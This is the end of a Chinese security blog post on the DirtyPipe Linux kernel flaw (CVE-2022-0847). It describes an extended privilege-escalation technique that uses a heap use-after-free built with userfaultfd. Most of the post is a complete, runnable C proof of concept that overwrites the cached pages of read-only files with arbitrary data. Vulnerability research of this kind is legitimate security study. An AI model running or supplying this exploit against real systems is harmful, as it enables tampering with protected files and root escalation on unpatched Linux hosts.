但是漏洞的修复只是将buf->flags进行了初始化,其他地方并没有修改,当程序存在0x400大小堆uaf或者溢出时,我们仍然可以利用这种手法进行提权。

溢出和直接uaf可能需要先泄露page指针以及fops结构体指针,倘若是利用userfaultfd机制构造的uaf,就可以做到零泄露攻击。

具体实现手法如下:

  1. 先mmap申请两个连续的0x1000的内存,并让addr2在uffd_buf_hack前面,此时只初始化addr2+0xff0(即uffd_buf_hack-0x10)的数据,uffd_buf_hack仍然是缺页的。
    image-20241011140602169

  2. 倘若我们想要在0x28的偏移处写入1个字节的数据,就可以在write时设置buf为uffd_buf_hack-0x28

    image-20241011140935379

  3. 之后内核在执行copy_from_user时,前面0x28个字节都是正常拷贝的,当到了0x29字节时,试图从uffd_buf_hack拷贝数据,从而触发缺页异常,然后我们free掉原有堆块,pipe申请新堆块,此时继续缺页拷贝,就会只覆盖0x28偏移的数据。

0x05.验证poc

直接抄arttnba3✌的poc了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
/*
* POC of CVE-2022-0847
* written by arttnba3
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

/*
 * Print a highlighted "[x] Error : <msg>" line on stdout and terminate the
 * process with EXIT_FAILURE. Never returns.
 *
 * msg is only read, so it is const-qualified; every caller passes a string
 * literal.
 */
void errExit(const char *msg)
{
    printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

/*
 * PoC entry point for CVE-2022-0847 (DirtyPipe).
 *
 * Usage: ./exp target_file offset_in_file data
 *
 * Steps:
 *   1. validate the arguments against the target file size and page layout;
 *   2. fill and then drain a fresh pipe so that every pipe_buffer slot keeps
 *      PIPE_BUF_FLAG_CAN_MERGE in its flags;
 *   3. splice one byte of the target file (at offset_in_file - 1) into the
 *      pipe, so the slot refers to the file's page;
 *   4. write the payload into the pipe, which lands in that page.
 *
 * Returns 0 on success; every failure terminates through errExit().
 */
int main(int argc, char **argv, char **envp)
{
    long page_size;
    size_t page_bytes;
    size_t offset_in_file;
    size_t data_size;
    size_t file_size;
    loff_t splice_offset;
    int target_file_fd;
    struct stat target_file_stat;
    int pipe_fd[2];
    int pipe_size;
    char *buffer;
    char *end;
    ssize_t retval;

    (void) envp;

    // checking before we start to exploit
    if (argc < 4)
    {
        puts("[*] Usage: ./exp target_file offset_in_file data");
        exit(EXIT_FAILURE);
    }

    page_size = sysconf(_SC_PAGE_SIZE);
    if (page_size <= 0)
        errExit("Failed to get the page size!");
    page_bytes = (size_t) page_size;

    // Reject an offset argument that is not entirely a number.
    offset_in_file = strtoul(argv[2], &end, 0);
    if (end == argv[2] || *end != '\0')
        errExit("Invalid offset!");
    if (offset_in_file % page_bytes == 0)
        errExit("Cannot write on the boundary of a page!");

    target_file_fd = open(argv[1], O_RDONLY);
    if (target_file_fd < 0)
        errExit("Failed to open the target file!");

    if (fstat(target_file_fd, &target_file_stat))
        errExit("Failed to get the info of the target file!");
    if (target_file_stat.st_size < 0)
        errExit("Failed to get the info of the target file!");
    file_size = (size_t) target_file_stat.st_size;

    if (offset_in_file > file_size)
        errExit("Offset is not in the file!");

    // Written as a subtraction so that offset + size cannot wrap around.
    data_size = strlen(argv[3]);
    if (data_size > file_size - offset_in_file)
        errExit("Cannot enlarge the file!");

    if (((offset_in_file % page_bytes) + data_size) > page_bytes)
        errExit("Cannot write accross a page!");

    // exploit now...
    puts("\033[34m\033[1m[*] Start exploiting...\033[0m");

    /*
     * prepare the pipe, make every pipe_buffer a MERGE flag
     * Just write and read through
     */
    puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m");
    if (pipe(pipe_fd) < 0)
        errExit("Failed to create the pipe!");
    pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
    if (pipe_size < 0)
        errExit("Failed to get the pipe size!");
    // calloc so that no uninitialised heap bytes are pushed into the pipe.
    buffer = calloc(1, page_bytes);
    if (buffer == NULL)
        errExit("Failed to allocate the buffer!");

    for (int size_left = pipe_size; size_left > 0; )
    {
        int per_write = size_left > page_size ? (int) page_size : size_left;
        ssize_t written = write(pipe_fd[1], buffer, (size_t) per_write);

        // A failed write must not be subtracted, or the loop never ends.
        if (written <= 0)
            errExit("Failed to fill the pipe!");
        size_left -= (int) written;
    }

    for (int size_left = pipe_size; size_left > 0; )
    {
        int per_read = size_left > page_size ? (int) page_size : size_left;
        ssize_t got = read(pipe_fd[0], buffer, (size_t) per_read);

        if (got <= 0)
            errExit("Failed to drain the pipe!");
        size_left -= (int) got;
    }

    puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m");

    /*
     * Use the splice to make the pipe_buffer->page
     * become the page of the file mapped, by read
     * a byte from the file accross the splice
     */
    puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m");
    // we read a byte, so offset should minus 1; splice() expects a loff_t *,
    // so a dedicated variable of that type is used instead of the size_t.
    splice_offset = (loff_t) offset_in_file - 1;
    retval = splice(target_file_fd, &splice_offset, pipe_fd[1], NULL, 1, 0);
    if (retval < 0)
        errExit("splice failed!");
    else if (retval == 0)
        errExit("short splice!");
    puts("\033[32m\033[1m[+] File splice done.\033[0m");

    /*
     * Now it comes to the time of exploit:
     * the mapped page of file has been in pipe_buffer,
     * and the PIPE_BUF_FLAG_CAN_MERGE is still set,
     * just a simple write can make the exploit.
     */
    retval = write(pipe_fd[1], argv[3], data_size);
    if (retval < 0)
        errExit("Write failed!");
    else if ((size_t) retval < data_size)
        errExit("Short write!");

    puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m");

    free(buffer);
    close(pipe_fd[0]);
    close(pipe_fd[1]);
    close(target_file_fd);
    return 0;
}

d2dedf15136433e9fd1ea4ca237e5be

  • Title: CVE-2022-0847 DirtyPipe漏洞分析及其延伸利用手法研究
  • Author: 0rb1t
  • Created at : 2024-10-04 18:06:13
  • Updated at : 2024-11-19 22:17:20
  • Link: https://redefine.ohevan.com/2024/10/04/CVE-2022-0847-DirtyPipe漏洞分析及其延申利用手法研究/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments